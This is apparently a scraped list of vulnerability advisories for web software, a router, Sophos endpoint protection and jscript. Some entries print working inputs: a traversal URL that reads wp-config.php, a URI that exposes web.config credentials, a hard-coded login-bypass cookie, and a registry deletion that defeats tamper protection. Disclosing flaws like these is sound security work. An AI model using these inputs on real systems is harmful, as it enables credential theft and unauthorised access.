Allows for an attacker to browse files via the download.php file: http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote attackers to read the web.config file, and consequently discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.
The vulnerability exists in plain text & hard coded cookie. Using any cookie manager extension, an attacker can bypass login page by setting the following Master Cookie. Cookie: Name=0admin. Then access the homepage which will no longer require authentication. Due to improper session implementation, there is another way to bypass login. The response header of homepage without authentication looks like this. HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html><head><script language='javascript'> parent.location='login.html' </script></head><body></body></html>HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source. The response header looks totally messed up and by triggering burp suite and modifying it to following will grant access to homepage without authentication. HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source.
Sophos endpoint protection control panel authentication uses weak unsalted unicoded cryptographic hash (SHA1) function, not using salt allows attackers that gain access to hash ability to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow for changing of settings, whitelist or unquarantine files.
Sophos Endpoint Protection offers an enhanced tamper protection mechanism which can be bypassed by deleting the registry key "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Sophos Endpoint Defense". This allows attackers to create arbitrary registry keys or edit keys and settings under the protected ""tamper"" protection config key
Cross-site scripting (XSS) vulnerability in admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13 allows remote attackers to inject arbitrary web script or HTML, as demonstrated by the movieName parameter.
This is a WebSite physical path leakage vulnerability. The proof of concept (POC) involves visiting the following pages: http://localhost/z-blog//zb_system/admin/admin_footer.php, http://localhost/z-blog//zb_system/admin/admin_header.php, http://localhost/z-blog//zb_system/admin/admin_left.php, http://localhost/z-blog//zb_system/admin/admin_top.php, http://localhost/z-blog//zb_system/function/c_system_admin.php, http://localhost/z-blog//zb_system/function/c_system_misc.php, http://localhost/z-blog//zb_system/function/lib/category.php, http://localhost/z-blog//zb_system/function/lib/comment.php, http://localhost/z-blog//zb_system/function/lib/dbmysql.php, http://localhost/z-blog//zb_system/function/lib/dbmysqli.php, http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php, http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php, http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php, http://localhost/z-blog//zb_system/function/lib/dbpgsql.php, http://localhost/z-blog//zb_system/function/lib/dbsqlite.php, http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php, http://localhost/z-blog//zb_system/function/lib/member.php, http://localhost/z-blog//zb_system/function/lib/module.php, http://localhost/z-blog//zb_system/function/lib/networkcurl.php, http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php, http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php, http://localhost/z-blog//zb_system/function/lib/post.php, http://localhost/z-blog//zb_system/function/lib/sqlmysql.php, http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php, http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php, http://localhost/z-blog//zb_system/function/lib/tag.php, http://localhost/z-blog//zb_syste
This is a XSS vulnerability than can attack the users. The vulnerability exists in the ZC_BLOG_SUBNAME and ZC_UPLOAD_FILETYPE parameters of the zb_system/cmd.php script. An attacker can inject malicious JavaScript code into the parameters and execute it in the user's browser.
This is a XSS vulnerability than can attack the users. The PoC includes four URLs that contain malicious code that can be used to execute a XSS attack.
When jscript executes an Array method (such as Array.join), it first retrieves the length of an array. If the input is not an array but an object, then the length property of the object is going to be retrieved and converted to scalar. During this conversion, the "length" property is not going to be tracked by the garbage collector and the conversion to scalar causes toString()/valueOf() callbacks to be triggered. Thus, during these callbacks, the "length" property could be freed and then the freed memory can be referenced by accessing the "this" variable inside the toString()/valueOf() function.
Services By CQR